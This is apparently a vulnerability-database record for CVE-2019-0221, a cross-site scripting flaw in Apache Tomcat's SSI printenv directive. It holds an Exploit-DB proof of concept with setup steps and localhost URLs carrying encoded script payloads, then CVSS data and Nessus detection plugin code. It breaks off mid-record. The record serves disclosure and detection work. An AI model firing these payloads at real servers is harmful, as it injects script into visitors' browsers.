Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)

2021-07-13T00:00:00

Description

{"id": "EDB-ID:50119", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)", "description": "", "published": "2021-07-13T00:00:00", "modified": "2021-07-13T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://www.exploit-db.com/exploits/50119", "reporter": "Central InfoSec", "references": [], "cvelist": ["2019-0221", "CVE-2019-0221"], "immutableFields": [], "lastseen": "2022-08-16T06:04:35", "viewCount": 341, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2019-1234", "ALAS-2019-1235"]}, {"type": "avleonov", "idList": ["AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"]}, {"type": "cve", "idList": ["CVE-2019-0221"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1810-1:6874E", "DEBIAN:DLA-1810-1:AF75C", "DEBIAN:DLA-1883-1:3E939", "DEBIAN:DSA-4596-1:D180A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-0221"]}, {"type": "f5", "idList": ["F5:K13184144"]}, {"type": "fedora", "idList": ["FEDORA:07D2762C825F", "FEDORA:87CE1617FCD1"]}, {"type": "gentoo", "idList": ["GLSA-202003-43"]}, {"type": "github", "idList": ["GHSA-JJPQ-GP5Q-8Q6W"]}, {"type": "hackerone", "idList": ["H1:874427"]}, {"type": "ibm", "idList": ["6B1C6EAA2CD3518A682D3056E09D4E1EA74C23C47C9F526F46AB4741F8D3E72F", "814A42F376BD84EA7C321ADD0697620A9CCFB64AA5053D864D6575D7386F0CD1", "B236D3400A0C6106EC62C77931DC3654EEBAB6EEA563B3344ECFF477FD634E81"]}, {"type": "kaspersky", "idList": ["KLA11472"]}, {"type": "mageia", "idList": ["MGASA-2019-0260"]}, {"type": "nessus", "idList": ["700711.PASL", "ALA_ALAS-2019-1234.NASL", "ALA_ALAS-2019-1235.NASL", "DEBIAN_DLA-1810.NASL", "DEBIAN_DLA-1883.NASL", "DEBIAN_DSA-4596.NASL", "EULEROS_SA-2019-1819.NASL", "EULEROS_SA-2019-1885.NASL", "EULEROS_SA-2019-2047.NASL", "EULEROS_SA-2019-2361.NASL", "FEDORA_2019-1A3F878D27.NASL", "FEDORA_2019-D66FEBB5DF.NASL", "GENTOO_GLSA-202003-43.NASL", "OPENSUSE-2019-1673.NASL", "OPENSUSE-2019-1808.NASL", "ORACLE_BI_PUBLISHER_APR_2021_CPU.NASL", "REDHAT-RHSA-2019-3929.NASL", "REDHAT-RHSA-2020-0861.NASL", "SUSE_SU-2020-14375-1.NASL", "TOMCAT_7_0_94.NASL", "TOMCAT_8_5_40.NASL", "TOMCAT_9_0_18.NASL", "UBUNTU_USN-4128-1.NASL", "UBUNTU_USN-4128-2.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142479", "OPENVAS:1361412562310142480", "OPENVAS:1361412562310704596", "OPENVAS:1361412562310844170", "OPENVAS:1361412562310844181", "OPENVAS:1361412562310852602", "OPENVAS:1361412562310852859", "OPENVAS:1361412562310876532", "OPENVAS:1361412562310876556", "OPENVAS:1361412562310891810", "OPENVAS:1361412562310891883", "OPENVAS:1361412562311220191819", "OPENVAS:1361412562311220191885", "OPENVAS:1361412562311220192047", "OPENVAS:1361412562311220192361"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2020", "ORACLE:CPUAPR2021", "ORACLE:CPUJAN2020"]}, {"type": "osv", "idList": ["OSV:DLA-1810-1", "OSV:DLA-1883-1", "OSV:DSA-4596-1", "OSV:GHSA-JJPQ-GP5Q-8Q6W"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163457"]}, {"type": "redhat", "idList": ["RHSA-2019:3929", "RHSA-2019:3931", "RHSA-2020:0860", "RHSA-2020:0861"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-0221"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1673-1", "OPENSUSE-SU-2019:1808-1"]}, {"type": "symantec", "idList": ["SMNTC-1765"]}, {"type": "tomcat", "idList": ["TOMCAT:5FF617CEB667027ABB70FDFB3A8FFD4C", "TOMCAT:95E28D1C95DD85DE7ADBDED721C3DA07", "TOMCAT:E4520A0C2F785FBF22985309FA3E3B08"]}, {"type": "ubuntu", "idList": ["USN-4128-1", "USN-4128-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-0221"]}, {"type": "zdt", "idList": ["1337DAY-ID-36546"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2019-1234", "ALAS-2019-1235"]}, {"type": "avleonov", "idList": ["AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"]}, {"type": "cve", "idList": ["CVE-2019-0221"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1810-1:AF75C"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-0221"]}, {"type": "f5", "idList": ["F5:K13184144"]}, {"type": "fedora", "idList": ["FEDORA:07D2762C825F", "FEDORA:87CE1617FCD1"]}, {"type": "gentoo", "idList": ["GLSA-202003-43"]}, {"type": "github", "idList": ["GHSA-JJPQ-GP5Q-8Q6W"]}, {"type": "hackerone", "idList": ["H1:874427"]}, {"type": "ibm", "idList": ["6B1C6EAA2CD3518A682D3056E09D4E1EA74C23C47C9F526F46AB4741F8D3E72F", "814A42F376BD84EA7C321ADD0697620A9CCFB64AA5053D864D6575D7386F0CD1"]}, {"type": "kaspersky", "idList": ["KLA11472"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/GENTOO-LINUX-CVE-2019-0221/", "MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-0221/", "MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-0221/"]}, {"type": "nessus", "idList": ["ALA_ALAS-2019-1234.NASL", "ALA_ALAS-2019-1235.NASL", "DEBIAN_DLA-1810.NASL", "EULEROS_SA-2019-1819.NASL", "EULEROS_SA-2019-1885.NASL", "EULEROS_SA-2019-2047.NASL", "FEDORA_2019-1A3F878D27.NASL", "FEDORA_2019-D66FEBB5DF.NASL", "REDHAT-RHSA-2019-3929.NASL", "REDHAT-RHSA-2020-0861.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142479", "OPENVAS:1361412562310142480", "OPENVAS:1361412562310844170", "OPENVAS:1361412562310844181", "OPENVAS:1361412562310852602", "OPENVAS:1361412562310876532", "OPENVAS:1361412562310876556", "OPENVAS:1361412562310891810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163457"]}, {"type": "redhat", "idList": ["RHSA-2020:0861"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-0221"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1673-1", "OPENSUSE-SU-2019:1808-1"]}, {"type": "symantec", "idList": ["SMNTC-1765"]}, {"type": "tomcat", "idList": ["TOMCAT:5FF617CEB667027ABB70FDFB3A8FFD4C"]}, {"type": "ubuntu", "idList": ["USN-4128-1", "USN-4128-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-0221"]}, {"type": "zdt", "idList": ["1337DAY-ID-36546"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-0221", "epss": "0.009370000", "percentile": "0.806700000", "modified": "2023-03-17"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1661190686, "score": 1661184847, "epss": 1679098904}, "_internal": {"score_hash": "c60dee55bd166f0e34e141454235423a"}, "sourceHref": "https://www.exploit-db.com/download/50119", "sourceData": "# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)\r\n# Date: 05/21/2019\r\n# Exploit Author: Central InfoSec\r\n# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93\r\n# CVE : CVE-2019-0221\r\n\r\n# Requirements:\r\n\r\n# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.\r\n\r\n# A file (usually \"*.shtml\") with the \"printenv\" SSI directive must exist within the web application.\r\n\r\n# The file must be accessible.\r\n\r\n\r\n\r\n# Proof of Concept:\r\n\r\n# Install a Java Runtime Environment (JRE)\r\n\r\n# Download a vulnerable version of Tomcat and extract the contents\r\n\r\n# Modify line 19 of the conf\\context.xml file to globally enable privileged context\r\nContext privileged=\"true\">\r\n\r\n# Modify conf\\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide\r\n\r\n# Put the following code in \"webapps/ROOT/ssi/printenv.shtml\"\r\n<html>\r\n <body>\r\n Echo:  \r\n Printenv: \r\n </body>\r\n</html>\r\n\r\n# Run Tomcat\r\ncd bin\r\ncatalina run\r\n\r\n# Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the \"echo\" directive which escapes properly and the \"printenv\" directive which does not escape properly\r\nhttp://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E\r\nhttp://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"nessus": [{"lastseen": "2023-02-17T23:24:47", "description": "The version of Tomcat installed on the remote Windows host is prior to 9.0.19. It is, therefore, affected by a remote code execution vulnerability due to a bug in the way the JRE passes command line arguments to Windows. An unauthenticated, remote attacker can exploit this to execute arbitrary commands. Additionally, it is affected by a cross-site (XSS) scripting vulnerability as the SSI printenv command echoes user provided data without proper escaping.\n\nNote that Nessus Network Monitor has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.x < 9.0.19 Remote Code Execution Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2019-05-13T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "700711.PASL", "href": "https://www.tenable.com/plugins/nnm/700711", "sourceData": "Binary data 700711.pasl", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-04T01:17:49", "description": "Nightwatch Cybersecurity Research team identified a XSS vulnerability in tomcat7. The SSI printenv command echoes user provided data without escaping. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n\nFor Debian 8 'Jessie', this problem has been fixed in version 7.0.56-3+really7.0.94-1.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-31T00:00:00", "type": "nessus", "title": "Debian DLA-1810-1 : tomcat7 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0221"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libservlet3.0-java", "p-cpe:/a:debian:debian_linux:libservlet3.0-java-doc", "p-cpe:/a:debian:debian_linux:libtomcat7-java", "p-cpe:/a:debian:debian_linux:tomcat7", "p-cpe:/a:debian:debian_linux:tomcat7-admin", "p-cpe:/a:debian:debian_linux:tomcat7-common", "p-cpe:/a:debian:debian_linux:tomcat7-docs", "p-cpe:/a:debian:debian_linux:tomcat7-examples", "p-cpe:/a:debian:debian_linux:tomcat7-user", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1810.NASL", "href": "https://www.tenable.com/plugins/nessus/125606", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1810-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125606);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2019-0221\");\n\n script_name(english:\"Debian DLA-1810-1 : tomcat7 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Nightwatch Cybersecurity Research team identified a XSS vulnerability\nin tomcat7. The SSI printenv command echoes user provided data without\nescaping. SSI is disabled by default. The printenv command is intended\nfor debugging and is unlikely to be present in a production website.\n\nFor Debian 8 'Jessie', this problem has been fixed in version\n7.0.56-3+really7.0.94-1.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00044.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/tomcat7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat7-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.56-3+really7.0.94-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.56-3+really7.0.94-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libtomcat7-java\", reference:\"7.0.56-3+really7.0.94-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7\", reference:\"7.0.56-3+really7.0.94-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-admin\", reference:\"7.0.56-3+really7.0.94-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-common\", reference:\"7.0.56-3+really7.0.94-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-docs\", reference:\"7.0.56-3+really7.0.94-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-examples\", reference:\"7.0.56-3+really7.0.94-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-user\", reference:\"7.0.56-3+really7.0.94-1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T15:22:17", "description": "According to the version of the tomcat packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.(CVE-2019-0221)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-08-27T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP8 : tomcat (EulerOS-SA-2019-1819)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:tomcat", "p-cpe:/a:huawei:euleros:tomcat-admin-webapps", "p-cpe:/a:huawei:euleros:tomcat-el-3.0-api", "p-cpe:/a:huawei:euleros:tomcat-jsp-2.3-api", "p-cpe:/a:huawei:euleros:tomcat-lib", "p-cpe:/a:huawei:euleros:tomcat-servlet-4.0-api", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-1819.NASL", "href": "https://www.tenable.com/plugins/nessus/128188", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128188);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-0221\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"EulerOS 2.0 SP8 : tomcat (EulerOS-SA-2019-1819)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - The SSI printenv command in Apache Tomcat 9.0.0.M1 to\n 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes\n user provided data without escaping and is, therefore,\n vulnerable to XSS. SSI is disabled by default. The\n printenv command is intended for debugging and is\n unlikely to be present in a production\n website.(CVE-2019-0221)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1819\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?084dfe58\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(8)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-9.0.10-1.h3.eulerosv2r8\",\n \"tomcat-admin-webapps-9.0.10-1.h3.eulerosv2r8\",\n \"tomcat-el-3.0-api-9.0.10-1.h3.eulerosv2r8\",\n \"tomcat-jsp-2.3-api-9.0.10-1.h3.eulerosv2r8\",\n \"tomcat-lib-9.0.10-1.h3.eulerosv2r8\",\n \"tomcat-servlet-4.0-api-9.0.10-1.h3.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"8\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T15:25:54", "description": "According to the version of the tomcat packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.(CVE-2019-0221)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-09-16T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : tomcat (EulerOS-SA-2019-1885)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:tomcat", "p-cpe:/a:huawei:euleros:tomcat-admin-webapps", "p-cpe:/a:huawei:euleros:tomcat-el-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-lib", "p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api", 